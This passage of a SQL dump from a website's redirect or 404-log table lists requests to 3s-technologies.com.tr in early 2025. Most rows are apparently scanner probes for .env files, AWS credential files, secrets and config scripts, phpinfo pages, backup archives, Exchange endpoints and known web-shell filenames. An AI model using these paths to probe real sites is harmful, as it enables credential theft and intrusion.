00:00:00',301),(37245,'https://3s-technologies.com.tr/tr/wp-content',NULL,'https://3s-technologies.com.tr/wp-content/','',2,0,'2025-01-26 14:58:24','0000-00-00 00:00:00',301),(37246,'https://3s-technologies.com.tr/tr/wp-json/wp/v2',NULL,'https://3s-technologies.com.tr/wp-json/wp/v2/','',1,0,'2025-01-26 14:58:26','0000-00-00 00:00:00',301),(37247,'https://3s-technologies.com.tr/tr/wp-content/themes',NULL,'https://3s-technologies.com.tr/wp-content/themes/','',1,0,'2025-01-26 14:58:27','0000-00-00 00:00:00',301),(37248,'https://3s-technologies.com.tr/tr/http:/drelaath.space',NULL,'','',2,0,'2025-01-27 16:12:17','0000-00-00 00:00:00',301),(37249,'http://3s-technologies.com.tr/tr/administrator/components/com_actionlogs/views/actionlogs/tmpl/tmpl.php?ch=1',NULL,'','',1,0,'2025-01-29 14:00:50','0000-00-00 00:00:00',301),(37250,'http://3s-technologies.com.tr/tr/administrator/components/com_associations/views/association/tmpl/tmpl.php?ch=1',NULL,'','',1,0,'2025-01-29 20:09:50','0000-00-00 00:00:00',301),(37251,'http://3s-technologies.com.tr/tr/js',NULL,'http://3s-technologies.com.tr/js','',5,0,'2025-01-31 12:10:56','0000-00-00 00:00:00',301),(37252,'http://3s-technologies.com.tr/tr/public_html.zip',NULL,'','',7,0,'2025-01-31 20:42:46','0000-00-00 00:00:00',301),(37253,'http://3s-technologies.com.tr/tr/site.zip',NULL,'','',6,0,'2025-02-01 21:46:40','0000-00-00 00:00:00',301),(37254,'https://3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videoposter   \'',NULL,'','',11,0,'2025-02-03 09:38:47','0000-00-00 00:00:00',301),(37255,'https://3s-technologies.com.tr/tr/plugins/content/jw_allvideos/jw_allvideos/includes/js/\'   videourl   \'',NULL,'','',11,0,'2025-02-03 09:38:50','0000-00-00 00:00:00',301),(37256,'https://3s-technologies.com.tr/tr/media/system/js/s',NULL,'','',1,0,'2025-02-03 10:14:03','0000-00-00 00:00:00',301),(37257,'https://3s-technologies.com.tr/tr/components/com_virtuemart/assets/js/fancybox/\' c \'',NULL,'','',14,0,'2025-02-03 10:17:28','0000-00-00 00:00:00',301),(37258,'https://mail.3s-technologies.com.tr/en/owa/auth/logon.aspx',NULL,'','',2,0,'2025-02-03 13:25:03','0000-00-00 00:00:00',301),(37259,'http://mail.3s-technologies.com.tr/en/owa/auth/logon.aspx',NULL,'','',2,0,'2025-02-03 13:25:04','0000-00-00 00:00:00',301),(37260,'https://mail.3s-technologies.com.tr/en/owa/auth.owa',NULL,'','',1,0,'2025-02-03 13:25:13','0000-00-00 00:00:00',301),(37261,'http://mail.3s-technologies.com.tr/en/owa/auth.owa',NULL,'','',1,0,'2025-02-03 13:25:14','0000-00-00 00:00:00',301),(37262,'https://mail.3s-technologies.com.tr/en/owa',NULL,'','',1,0,'2025-02-03 13:25:15','0000-00-00 00:00:00',301),(37263,'http://mail.3s-technologies.com.tr/en/owa',NULL,'','',1,0,'2025-02-03 13:25:16','0000-00-00 00:00:00',301),(37264,'https://mail.3s-technologies.com.tr/en/owa/auth/modern',NULL,'','',1,0,'2025-02-03 13:25:18','0000-00-00 00:00:00',301),(37265,'http://mail.3s-technologies.com.tr/en/owa/auth/modern',NULL,'','',1,0,'2025-02-03 13:25:19','0000-00-00 00:00:00',301),(37266,'https://mail.3s-technologies.com.tr/en/owa/auth/15.0.1497/themes/resources/exchange',NULL,'','',1,0,'2025-02-03 13:25:20','0000-00-00 00:00:00',301),(37267,'http://mail.3s-technologies.com.tr/en/owa/auth/15.0.1497/themes/resources/exchange',NULL,'','',1,0,'2025-02-03 13:25:21','0000-00-00 00:00:00',301),(37268,'https://mail.3s-technologies.com.tr/en/autodiscover/autodiscover.xml',NULL,'','',1,0,'2025-02-03 13:25:22','0000-00-00 00:00:00',301),(37269,'http://mail.3s-technologies.com.tr/en/autodiscover/autodiscover.xml',NULL,'','',1,0,'2025-02-03 13:25:23','0000-00-00 00:00:00',301),(37270,'https://mail.3s-technologies.com.tr/en/ews/exchange.asmx',NULL,'','',1,0,'2025-02-03 13:25:24','0000-00-00 00:00:00',301),(37271,'http://mail.3s-technologies.com.tr/en/ews/exchange.asmx',NULL,'','',1,0,'2025-02-03 13:25:25','0000-00-00 00:00:00',301),(37272,'https://mail.3s-technologies.com.tr/en/ews/services.wsdl',NULL,'','',1,0,'2025-02-03 13:25:27','0000-00-00 00:00:00',301),(37273,'http://mail.3s-technologies.com.tr/en/ews/services.wsdl',NULL,'','',1,0,'2025-02-03 13:25:28','0000-00-00 00:00:00',301),(37274,'http://mail.3s-technologies.com.tr/en/microsoft-server-activesync',NULL,'','',1,0,'2025-02-03 13:25:30','0000-00-00 00:00:00',301),(37275,'https://mail.3s-technologies.com.tr/en/rpc',NULL,'','',1,0,'2025-02-03 13:25:31','0000-00-00 00:00:00',301),(37276,'http://mail.3s-technologies.com.tr/en/rpc',NULL,'','',1,0,'2025-02-03 13:25:32','0000-00-00 00:00:00',301),(37277,'https://mail.3s-technologies.com.tr/en/ecp',NULL,'','',1,0,'2025-02-03 13:25:33','0000-00-00 00:00:00',301),(37278,'http://mail.3s-technologies.com.tr/en/ecp',NULL,'','',1,0,'2025-02-03 13:25:34','0000-00-00 00:00:00',301),(37279,'http://www.3s-technologies.com.tr/tr/_profiler/phpinfo',NULL,'','',1,0,'2025-02-04 14:02:16','0000-00-00 00:00:00',301),(37280,'http://www.3s-technologies.com.tr/tr/php.php',NULL,'','',3,0,'2025-02-04 14:02:24','0000-00-00 00:00:00',301),(37281,'http://www.3s-technologies.com.tr/tr/test.php',NULL,'','',6,0,'2025-02-04 14:02:25','0000-00-00 00:00:00',301),(37282,'http://3s-technologies.com.tr/tr/main.js?type=rau',NULL,'http://3s-technologies.com.tr/main.js?type=rau','',1,0,'2025-02-04 23:49:45','0000-00-00 00:00:00',301),(37283,'http://3s-technologies.com.tr/tr/app.js?type=rau',NULL,'http://3s-technologies.com.tr/app.js?type=rau','',1,0,'2025-02-04 23:53:28','0000-00-00 00:00:00',301),(37284,'http://3s-technologies.com.tr/tr/index.js?type=rau',NULL,'http://3s-technologies.com.tr/index.js?type=rau','',1,0,'2025-02-04 23:54:38','0000-00-00 00:00:00',301),(37285,'http://3s-technologies.com.tr/tr/bundle.js?type=rau',NULL,'http://3s-technologies.com.tr/bundle.js?type=rau','',1,0,'2025-02-04 23:55:39','0000-00-00 00:00:00',301),(37286,'http://3s-technologies.com.tr/tr/global.js?type=rau',NULL,'http://3s-technologies.com.tr/global.js?type=rau','',1,0,'2025-02-04 23:56:25','0000-00-00 00:00:00',301),(37287,'http://3s-technologies.com.tr/tr/common.js?type=rau',NULL,'http://3s-technologies.com.tr/common.js?type=rau','',1,0,'2025-02-04 23:57:35','0000-00-00 00:00:00',301),(37288,'http://3s-technologies.com.tr/tr/site.js?type=rau',NULL,'http://3s-technologies.com.tr/site.js?type=rau','',1,0,'2025-02-04 23:58:28','0000-00-00 00:00:00',301),(37289,'http://3s-technologies.com.tr/tr/script.js?type=rau',NULL,'http://3s-technologies.com.tr/script.js?type=rau','',1,0,'2025-02-05 00:00:20','0000-00-00 00:00:00',301),(37290,'http://3s-technologies.com.tr/tr/init.js?type=rau',NULL,'http://3s-technologies.com.tr/init.js?type=rau','',1,0,'2025-02-05 00:01:29','0000-00-00 00:00:00',301),(37291,'http://3s-technologies.com.tr/tr/utils.js?type=rau',NULL,'http://3s-technologies.com.tr/utils.js?type=rau','',1,0,'2025-02-05 00:02:38','0000-00-00 00:00:00',301),(37292,'http://3s-technologies.com.tr/tr/settings.js?type=rau',NULL,'http://3s-technologies.com.tr/settings.js?type=rau','',1,0,'2025-02-05 00:04:18','0000-00-00 00:00:00',301),(37293,'http://3s-technologies.com.tr/tr/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/secrets.js?type=rau','',1,0,'2025-02-05 00:06:31','0000-00-00 00:00:00',301),(37294,'http://3s-technologies.com.tr/tr/credentials.js?type=rau',NULL,'http://3s-technologies.com.tr/credentials.js?type=rau','',1,0,'2025-02-05 00:07:25','0000-00-00 00:00:00',301),(37295,'http://3s-technologies.com.tr/tr/aws.js?type=rau',NULL,'http://3s-technologies.com.tr/aws.js?type=rau','',1,0,'2025-02-05 00:09:14','0000-00-00 00:00:00',301),(37296,'http://3s-technologies.com.tr/tr/api.js?type=rau',NULL,'http://3s-technologies.com.tr/api.js?type=rau','',1,0,'2025-02-05 00:10:20','0000-00-00 00:00:00',301),(37297,'http://3s-technologies.com.tr/tr/backend.js?type=rau',NULL,'http://3s-technologies.com.tr/backend.js?type=rau','',1,0,'2025-02-05 00:11:18','0000-00-00 00:00:00',301),(37298,'http://3s-technologies.com.tr/tr/frontend.js?type=rau',NULL,'http://3s-technologies.com.tr/frontend.js?type=rau','',1,0,'2025-02-05 00:12:32','0000-00-00 00:00:00',301),(37299,'http://3s-technologies.com.tr/tr/scripts/index.js?type=rau',NULL,'http://3s-technologies.com.tr/scripts/index.js?type=rau','',1,0,'2025-02-05 00:13:41','0000-00-00 00:00:00',301),(37300,'http://3s-technologies.com.tr/tr/scripts/keys.js?type=rau',NULL,'http://3s-technologies.com.tr/scripts/keys.js?type=rau','',1,0,'2025-02-05 00:14:42','0000-00-00 00:00:00',301),(37301,'http://3s-technologies.com.tr/tr/scripts/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/scripts/secrets.js?type=rau','',1,0,'2025-02-05 00:15:46','0000-00-00 00:00:00',301),(37302,'http://3s-technologies.com.tr/tr/scripts/env.js?type=rau',NULL,'http://3s-technologies.com.tr/scripts/env.js?type=rau','',1,0,'2025-02-05 00:16:33','0000-00-00 00:00:00',301),(37303,'http://3s-technologies.com.tr/tr/scripts/config.js?type=rau',NULL,'http://3s-technologies.com.tr/scripts/config.js?type=rau','',1,0,'2025-02-05 00:18:01','0000-00-00 00:00:00',301),(37304,'http://3s-technologies.com.tr/tr/scripts/app.js?type=rau',NULL,'http://3s-technologies.com.tr/scripts/app.js?type=rau','',1,0,'2025-02-05 00:18:49','0000-00-00 00:00:00',301),(37305,'http://3s-technologies.com.tr/tr/scripts/main.js?type=rau',NULL,'http://3s-technologies.com.tr/scripts/main.js?type=rau','',1,0,'2025-02-05 00:20:09','0000-00-00 00:00:00',301),(37306,'http://3s-technologies.com.tr/tr/js/index.js?type=rau',NULL,'http://3s-technologies.com.tr/js/index.js?type=rau','',1,0,'2025-02-05 00:20:19','0000-00-00 00:00:00',301),(37307,'http://3s-technologies.com.tr/tr/js/utils.js?type=rau',NULL,'http://3s-technologies.com.tr/js/utils.js?type=rau','',1,0,'2025-02-05 00:22:11','0000-00-00 00:00:00',301),(37308,'http://3s-technologies.com.tr/tr/js/script.js?type=rau',NULL,'http://3s-technologies.com.tr/js/script.js?type=rau','',1,0,'2025-02-05 00:22:58','0000-00-00 00:00:00',301),(37309,'http://3s-technologies.com.tr/tr/js/keys.js?type=rau',NULL,'http://3s-technologies.com.tr/js/keys.js?type=rau','',1,0,'2025-02-05 00:23:54','0000-00-00 00:00:00',301),(37310,'http://3s-technologies.com.tr/tr/js/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/js/secrets.js?type=rau','',1,0,'2025-02-05 00:24:50','0000-00-00 00:00:00',301),(37311,'http://3s-technologies.com.tr/tr/js/env.js?type=rau',NULL,'http://3s-technologies.com.tr/js/env.js?type=rau','',1,0,'2025-02-05 00:25:59','0000-00-00 00:00:00',301),(37312,'http://3s-technologies.com.tr/tr/js/app.js?type=rau',NULL,'http://3s-technologies.com.tr/js/app.js?type=rau','',1,0,'2025-02-05 00:28:07','0000-00-00 00:00:00',301),(37313,'http://3s-technologies.com.tr/tr/js/main.js?type=rau',NULL,'http://3s-technologies.com.tr/js/main.js?type=rau','',1,0,'2025-02-05 00:29:21','0000-00-00 00:00:00',301),(37314,'http://3s-technologies.com.tr/tr/config/smtp.js?type=rau',NULL,'http://3s-technologies.com.tr/config/smtp.js?type=rau','',1,0,'2025-02-05 00:29:56','0000-00-00 00:00:00',301),(37315,'http://3s-technologies.com.tr/tr/config/mail.js?type=rau',NULL,'http://3s-technologies.com.tr/config/mail.js?type=rau','',1,0,'2025-02-05 00:31:21','0000-00-00 00:00:00',301),(37316,'http://3s-technologies.com.tr/tr/config/email.js?type=rau',NULL,'http://3s-technologies.com.tr/config/email.js?type=rau','',1,0,'2025-02-05 00:32:27','0000-00-00 00:00:00',301),(37317,'http://3s-technologies.com.tr/tr/config/credentials.js?type=rau',NULL,'http://3s-technologies.com.tr/config/credentials.js?type=rau','',1,0,'2025-02-05 00:32:46','0000-00-00 00:00:00',301),(37318,'http://3s-technologies.com.tr/tr/config/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/config/secrets.js?type=rau','',1,0,'2025-02-05 00:34:22','0000-00-00 00:00:00',301),(37319,'http://3s-technologies.com.tr/tr/config/auth.js?type=rau',NULL,'http://3s-technologies.com.tr/config/auth.js?type=rau','',1,0,'2025-02-05 00:34:36','0000-00-00 00:00:00',301),(37320,'http://3s-technologies.com.tr/tr/src/config/smtp.js?type=rau',NULL,'http://3s-technologies.com.tr/src/config/smtp.js?type=rau','',1,0,'2025-02-05 00:37:06','0000-00-00 00:00:00',301),(37321,'http://3s-technologies.com.tr/tr/src/config/mail.js?type=rau',NULL,'http://3s-technologies.com.tr/src/config/mail.js?type=rau','',1,0,'2025-02-05 00:37:44','0000-00-00 00:00:00',301),(37322,'http://3s-technologies.com.tr/tr/src/config/email.js?type=rau',NULL,'http://3s-technologies.com.tr/src/config/email.js?type=rau','',1,0,'2025-02-05 00:38:43','0000-00-00 00:00:00',301),(37323,'http://3s-technologies.com.tr/tr/src/config/credentials.js?type=rau',NULL,'http://3s-technologies.com.tr/src/config/credentials.js?type=rau','',1,0,'2025-02-05 00:40:15','0000-00-00 00:00:00',301),(37324,'http://3s-technologies.com.tr/tr/src/config/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/src/config/secrets.js?type=rau','',1,0,'2025-02-05 00:40:28','0000-00-00 00:00:00',301),(37325,'http://3s-technologies.com.tr/tr/src/config/auth.js?type=rau',NULL,'http://3s-technologies.com.tr/src/config/auth.js?type=rau','',1,0,'2025-02-05 00:41:44','0000-00-00 00:00:00',301),(37326,'http://3s-technologies.com.tr/tr/src/config/config.js?type=rau',NULL,'http://3s-technologies.com.tr/src/config/config.js?type=rau','',1,0,'2025-02-05 00:42:34','0000-00-00 00:00:00',301),(37327,'http://3s-technologies.com.tr/tr/lib/config/smtp.js?type=rau',NULL,'http://3s-technologies.com.tr/lib/config/smtp.js?type=rau','',1,0,'2025-02-05 00:43:26','0000-00-00 00:00:00',301),(37328,'http://3s-technologies.com.tr/tr/lib/config/mail.js?type=rau',NULL,'http://3s-technologies.com.tr/lib/config/mail.js?type=rau','',1,0,'2025-02-05 00:44:32','0000-00-00 00:00:00',301),(37329,'http://3s-technologies.com.tr/tr/lib/config/email.js?type=rau',NULL,'http://3s-technologies.com.tr/lib/config/email.js?type=rau','',1,0,'2025-02-05 00:45:36','0000-00-00 00:00:00',301),(37330,'http://3s-technologies.com.tr/tr/lib/config/credentials.js?type=rau',NULL,'http://3s-technologies.com.tr/lib/config/credentials.js?type=rau','',1,0,'2025-02-05 00:46:55','0000-00-00 00:00:00',301),(37331,'http://3s-technologies.com.tr/tr/lib/config/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/lib/config/secrets.js?type=rau','',1,0,'2025-02-05 00:47:40','0000-00-00 00:00:00',301),(37332,'http://3s-technologies.com.tr/tr/lib/config/auth.js?type=rau',NULL,'http://3s-technologies.com.tr/lib/config/auth.js?type=rau','',1,0,'2025-02-05 00:48:43','0000-00-00 00:00:00',301),(37333,'http://3s-technologies.com.tr/tr/lib/config/config.js?type=rau',NULL,'http://3s-technologies.com.tr/lib/config/config.js?type=rau','',1,0,'2025-02-05 00:49:20','0000-00-00 00:00:00',301),(37334,'http://3s-technologies.com.tr/tr/public/config.js?type=rau',NULL,'http://3s-technologies.com.tr/public/config.js?type=rau','',1,0,'2025-02-05 00:50:26','0000-00-00 00:00:00',301),(37335,'http://3s-technologies.com.tr/tr/public/app.js?type=rau',NULL,'http://3s-technologies.com.tr/public/app.js?type=rau','',1,0,'2025-02-05 00:51:01','0000-00-00 00:00:00',301),(37336,'http://3s-technologies.com.tr/tr/public/main.js?type=rau',NULL,'http://3s-technologies.com.tr/public/main.js?type=rau','',1,0,'2025-02-05 00:52:36','0000-00-00 00:00:00',301),(37337,'http://3s-technologies.com.tr/tr/assets/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/assets/secrets.js?type=rau','',1,0,'2025-02-05 00:52:48','0000-00-00 00:00:00',301),(37338,'http://3s-technologies.com.tr/tr/assets/config.js?type=rau',NULL,'http://3s-technologies.com.tr/assets/config.js?type=rau','',1,0,'2025-02-05 00:54:22','0000-00-00 00:00:00',301),(37339,'http://3s-technologies.com.tr/tr/assets/app.js?type=rau',NULL,'http://3s-technologies.com.tr/assets/app.js?type=rau','',1,0,'2025-02-05 00:54:50','0000-00-00 00:00:00',301),(37340,'http://3s-technologies.com.tr/tr/assets/main.js?type=rau',NULL,'http://3s-technologies.com.tr/assets/main.js?type=rau','',1,0,'2025-02-05 00:55:51','0000-00-00 00:00:00',301),(37341,'http://3s-technologies.com.tr/tr/static/secrets.js?type=rau',NULL,'http://3s-technologies.com.tr/static/secrets.js?type=rau','',1,0,'2025-02-05 00:56:47','0000-00-00 00:00:00',301),(37342,'http://3s-technologies.com.tr/tr/static/config.js?type=rau',NULL,'http://3s-technologies.com.tr/static/config.js?type=rau','',1,0,'2025-02-05 00:58:21','0000-00-00 00:00:00',301),(37343,'http://3s-technologies.com.tr/tr/static/app.js?type=rau',NULL,'http://3s-technologies.com.tr/static/app.js?type=rau','',1,0,'2025-02-05 00:58:49','0000-00-00 00:00:00',301),(37344,'http://3s-technologies.com.tr/tr/static/main.js?type=rau',NULL,'http://3s-technologies.com.tr/static/main.js?type=rau','',1,0,'2025-02-05 01:00:03','0000-00-00 00:00:00',301),(37345,'http://3s-technologies.com.tr/tr/wp-content/themes/digital-download/up.php',NULL,'','',4,0,'2025-02-05 15:19:48','0000-00-00 00:00:00',301),(37346,'http://3s-technologies.com.tr/tr/images/images/cache.php',NULL,'','',3,0,'2025-02-07 07:29:31','0000-00-00 00:00:00',301),(37347,'http://3s-technologies.com.tr/tr/cgi-bin/cgi-bin/cache.php',NULL,'','',1,0,'2025-02-07 07:29:31','0000-00-00 00:00:00',301),(37348,'http://3s-technologies.com.tr/tr/archives/archives/cache.php',NULL,'','',1,0,'2025-02-07 07:29:32','0000-00-00 00:00:00',301),(37349,'http://3s-technologies.com.tr/tr/log/log/cache.php',NULL,'','',1,0,'2025-02-07 07:29:33','0000-00-00 00:00:00',301),(37350,'http://3s-technologies.com.tr/tr/cli/cli/cache.php',NULL,'','',1,0,'2025-02-07 07:29:34','0000-00-00 00:00:00',301),(37351,'https://3s-technologies.com.tr/tr/images/images/cache.php',NULL,'','',1,0,'2025-02-08 14:01:41','0000-00-00 00:00:00',301),(37352,'https://3s-technologies.com.tr/tr/cgi-bin/cgi-bin/cache.php',NULL,'','',1,0,'2025-02-08 14:01:42','0000-00-00 00:00:00',301),(37353,'https://3s-technologies.com.tr/tr/archives/archives/cache.php',NULL,'','',1,0,'2025-02-08 14:01:44','0000-00-00 00:00:00',301),(37354,'https://3s-technologies.com.tr/tr/log/log/cache.php',NULL,'','',1,0,'2025-02-08 14:01:45','0000-00-00 00:00:00',301),(37355,'https://3s-technologies.com.tr/tr/cli/cli/cache.php',NULL,'','',1,0,'2025-02-08 14:01:47','0000-00-00 00:00:00',301),(37356,'http://3s-technologies.com.tr/wp-content/plugins/wp-ver.php',NULL,'www.google.com','',3,0,'2025-02-11 12:43:33','0000-00-00 00:00:00',301),(37357,'https://3s-technologies.com.tr/wp-content/plugins/wp-ver.php',NULL,'www.google.com','',2,0,'2025-02-11 12:44:09','0000-00-00 00:00:00',301),(37358,'http://mail.3s-technologies.com.tr/wp-content/plugins/wp-ver.php',NULL,'www.google.com','',1,0,'2025-02-11 20:44:51','0000-00-00 00:00:00',301),(37359,'https://mail.3s-technologies.com.tr/wp-content/plugins/wp-ver.php',NULL,'www.google.com','',1,0,'2025-02-11 20:44:55','0000-00-00 00:00:00',301),(37360,'https://3s-technologies.com.tr/tr/components/com_taskmanager/library/task.php',NULL,'','',2,0,'2025-02-12 20:13:35','0000-00-00 00:00:00',301),(37361,'https://3s-technologies.com.tr/tr/minstly.php',NULL,'','',1,0,'2025-02-12 20:18:19','0000-00-00 00:00:00',301),(37362,'https://3s-technologies.com.tr/tr/components/com_reloader/reload.php',NULL,'','',1,0,'2025-02-13 00:46:40','0000-00-00 00:00:00',301),(37363,'https://3s-technologies.com.tr/tr/components/com_initializer/com_initializer.php',NULL,'','',1,0,'2025-02-13 00:46:41','0000-00-00 00:00:00',301),(37364,'https://3s-technologies.com.tr/tr/components/com_rebuilder/rebuilder.php',NULL,'','',1,0,'2025-02-13 00:46:43','0000-00-00 00:00:00',301),(37365,'https://3s-technologies.com.tr/tr/components/com_engine/engine.php',NULL,'','',1,0,'2025-02-13 00:46:44','0000-00-00 00:00:00',301),(37366,'https://3s-technologies.com.tr/tr/components/com_commod/commod.php',NULL,'','',1,0,'2025-02-13 00:46:46','0000-00-00 00:00:00',301),(37367,'https://www.3s-technologies.com.tr/tr/.env.local',NULL,'','',5,0,'2025-02-14 18:17:32','0000-00-00 00:00:00',301),(37368,'https://www.3s-technologies.com.tr/tr/.env.production',NULL,'','',7,0,'2025-02-14 18:17:33','0000-00-00 00:00:00',301),(37369,'https://www.3s-technologies.com.tr/tr/blog.env',NULL,'','',1,0,'2025-02-14 18:17:34','0000-00-00 00:00:00',301),(37370,'https://www.3s-technologies.com.tr/tr/wp-content/.env',NULL,'','',1,0,'2025-02-14 18:17:35','0000-00-00 00:00:00',301),(37371,'https://www.3s-technologies.com.tr/tr/application/.env',NULL,'','',1,0,'2025-02-14 18:17:37','0000-00-00 00:00:00',301),(37372,'https://www.3s-technologies.com.tr/tr/app/.env',NULL,'','',8,0,'2025-02-14 18:17:38','0000-00-00 00:00:00',301),(37373,'https://www.3s-technologies.com.tr/tr/config/.env',NULL,'','',2,0,'2025-02-14 18:17:39','0000-00-00 00:00:00',301),(37374,'https://www.3s-technologies.com.tr/tr/api/.env',NULL,'','',13,0,'2025-02-14 18:17:39','0000-00-00 00:00:00',301),(37375,'https://www.3s-technologies.com.tr/tr/config.json',NULL,'','',1,0,'2025-02-14 18:17:40','0000-00-00 00:00:00',301),(37376,'https://www.3s-technologies.com.tr/tr/laravel/.env',NULL,'','',7,0,'2025-02-14 18:17:41','0000-00-00 00:00:00',301),(37377,'https://www.3s-technologies.com.tr/tr/library/.env',NULL,'','',1,0,'2025-02-14 18:17:42','0000-00-00 00:00:00',301),(37378,'https://www.3s-technologies.com.tr/tr/nextjs-app/.env',NULL,'','',1,0,'2025-02-14 18:17:42','0000-00-00 00:00:00',301),(37379,'https://www.3s-technologies.com.tr/tr/node-api/.env',NULL,'','',1,0,'2025-02-14 18:17:43','0000-00-00 00:00:00',301),(37380,'https://www.3s-technologies.com.tr/tr/vendor/.env',NULL,'','',1,0,'2025-02-14 18:17:44','0000-00-00 00:00:00',301),(37381,'https://www.3s-technologies.com.tr/tr/.aws/credentials',NULL,'','',3,0,'2025-02-14 18:17:44','0000-00-00 00:00:00',301),(37382,'https://www.3s-technologies.com.tr/tr/home/user/.aws/credentials',NULL,'','',1,0,'2025-02-14 18:17:45','0000-00-00 00:00:00',301),(37383,'https://www.3s-technologies.com.tr/tr/myproject/.env',NULL,'','',1,0,'2025-02-14 18:17:46','0000-00-00 00:00:00',301),(37384,'https://www.3s-technologies.com.tr/tr/.envs/.production/.django',NULL,'','',1,0,'2025-02-14 18:17:47','0000-00-00 00:00:00',301),(37385,'https://www.3s-technologies.com.tr/tr/react-app/.env',NULL,'','',1,0,'2025-02-14 18:17:47','0000-00-00 00:00:00',301),(37386,'https://www.3s-technologies.com.tr/tr/react-app/.env.production',NULL,'','',1,0,'2025-02-14 18:17:48','0000-00-00 00:00:00',301),(37387,'https://www.3s-technologies.com.tr/tr/config/secrets.json',NULL,'','',1,0,'2025-02-14 18:17:49','0000-00-00 00:00:00',301),(37388,'https://www.3s-technologies.com.tr/tr/config/settings.json',NULL,'','',1,0,'2025-02-14 18:17:49','0000-00-00 00:00:00',301),(37389,'https://www.3s-technologies.com.tr/tr/phpinfo',NULL,'','',6,0,'2025-02-14 18:17:50','0000-00-00 00:00:00',301),(37390,'https://www.3s-technologies.com.tr/tr/_profiler/phpinfo',NULL,'','',2,0,'2025-02-14 18:17:51','0000-00-00 00:00:00',301),(37391,'https://www.3s-technologies.com.tr/tr/phpinfo.php',NULL,'','',5,0,'2025-02-14 18:17:52','0000-00-00 00:00:00',301),(37392,'https://www.3s-technologies.com.tr/tr/info.php',NULL,'','',5,0,'2025-02-14 18:17:53','0000-00-00 00:00:00',301),(37393,'https://3s-technologies.com.tr/tr/.env.local',NULL,'','',31,0,'2025-02-15 02:50:40','0000-00-00 00:00:00',301),(37394,'https://3s-technologies.com.tr/tr/.env.production',NULL,'','',30,0,'2025-02-15 02:50:41','0000-00-00 00:00:00',301),(37395,'https://3s-technologies.com.tr/tr/blog.env',NULL,'','',8,0,'2025-02-15 02:50:42','0000-00-00 00:00:00',301),(37396,'https://3s-technologies.com.tr/tr/application/.env',NULL,'','',15,0,'2025-02-15 02:50:46','0000-00-00 00:00:00',301),(37397,'https://3s-technologies.com.tr/tr/config/.env',NULL,'','',24,0,'2025-02-15 02:50:47','0000-00-00 00:00:00',301),(37398,'https://3s-technologies.com.tr/tr/config.json',NULL,'','',16,0,'2025-02-15 02:50:49','0000-00-00 00:00:00',301),(37399,'https://3s-technologies.com.tr/tr/nextjs-app/.env',NULL,'','',8,0,'2025-02-15 02:50:51','0000-00-00 00:00:00',301),(37400,'https://3s-technologies.com.tr/tr/node-api/.env',NULL,'','',8,0,'2025-02-15 02:50:52','0000-00-00 00:00:00',301),(37401,'https://3s-technologies.com.tr/tr/home/user/.aws/credentials',NULL,'','',4,0,'2025-02-15 02:50:54','0000-00-00 00:00:00',301),(37402,'https://3s-technologies.com.tr/tr/myproject/.env',NULL,'','',8,0,'2025-02-15 02:50:54','0000-00-00 00:00:00',301),(37403,'https://3s-technologies.com.tr/tr/.envs/.production/.django',NULL,'','',8,0,'2025-02-15 02:50:55','0000-00-00 00:00:00',301),(37404,'https://3s-technologies.com.tr/tr/react-app/.env',NULL,'','',8,0,'2025-02-15 02:50:55','0000-00-00 00:00:00',301),(37405,'https://3s-technologies.com.tr/tr/react-app/.env.production',NULL,'','',8,0,'2025-02-15 02:50:57','0000-00-00 00:00:00',301),(37406,'https://3s-technologies.com.tr/tr/config/secrets.json',NULL,'','',4,0,'2025-02-15 02:50:58','0000-00-00 00:00:00',301),(37407,'https://3s-technologies.com.tr/tr/config/settings.json',NULL,'','',4,0,'2025-02-15 02:50:59','0000-00-00 00:00:00',301),(37408,'https://3s-technologies.com.tr/tr/phpinfo',NULL,'','',16,0,'2025-02-15 02:50:59','0000-00-00 00:00:00',301),(37409,'https://3s-technologies.com.tr/tr/phpinfo.php',NULL,'','',18,0,'2025-02-15 02:51:00','0000-00-00 00:00:00',301),(37410,'https://3s-technologies.com.tr/tr/info.php',NULL,'','',22,0,'2025-02-15 02:51:01','0000-00-00 00:00:00',301),(37411,'https://3s-technologies.com.tr:443/autodiscover/autodiscover.xml',NULL,'','',5,0,'2025-02-16 20:32:51','0000-00-00 00:00:00',301),(37412,'http://3s-technologies.com.tr/tr/geju.php',NULL,'','',46,0,'2025-02-16 21:54:08','0000-00-00 00:00:00',301),(37413,'http://3s-technologies.com.tr/tr/hoot.php',NULL,'','',51,0,'2025-02-16 21:54:16','0000-00-00 00:00:00',301),(37414,'http://3s-technologies.com.tr/tr/ayk.php',NULL,'','',32,0,'2025-02-16 21:54:19','0000-00-00 00:00:00',301),(37415,'http://3s-technologies.com.tr/tr/wp-content/plugins/wp-automatic/inc/csv.php',NULL,'','',4,0,'2025-02-17 10:50:17','0000-00-00 00:00:00',301),(37416,'http://3s-technologies.com.tr/en/ioxi01.php',NULL,'www.google.com','',5,0,'2025-02-19 06:28:12','0000-00-00 00:00:00',301),(37417,'https://3s-technologies.com.tr/en/ioxi02.php',NULL,'www.google.com','',5,0,'2025-02-19 06:28:31','0000-00-00 00:00:00',301),(37418,'http://3s-technologies.com.tr/tr/wp-includes/certificates/wp-conflg.php',NULL,'','',6,0,'2025-02-21 00:58:47','0000-00-00 00:00:00',301),(37419,'http://3s-technologies.com.tr/tr/wp-admin/includes/wp-conflg.php',NULL,'','',46,0,'2025-02-21 00:58:50','0000-00-00 00:00:00',301),(37420,'http://3s-technologies.com.tr/tr/wp-includes/phpmailer/wp-conflg.php',NULL,'','',10,0,'2025-02-21 00:58:52','0000-00-00 00:00:00',301),(37421,'http://3s-technologies.com.tr/tr/wp-admin/js/wp-conflg.php',NULL,'','',174,0,'2025-02-21 00:58:54','0000-00-00 00:00:00',301),(37422,'http://3s-technologies.com.tr/tr/wp-admin/css/wp-conflg.php',NULL,'','',125,0,'2025-02-21 00:58:56','0000-00-00 00:00:00',301),(37423,'http://3s-technologies.com.tr/tr/wp-includes/rest-api/wp-conflg.php',NULL,'','',2,0,'2025-02-21 00:58:58','0000-00-00 00:00:00',301),(37424,'http://3s-technologies.com.tr/tr/wp-includes/sitemaps/wp-conflg.php',NULL,'','',1,0,'2025-02-21 00:58:59','0000-00-00 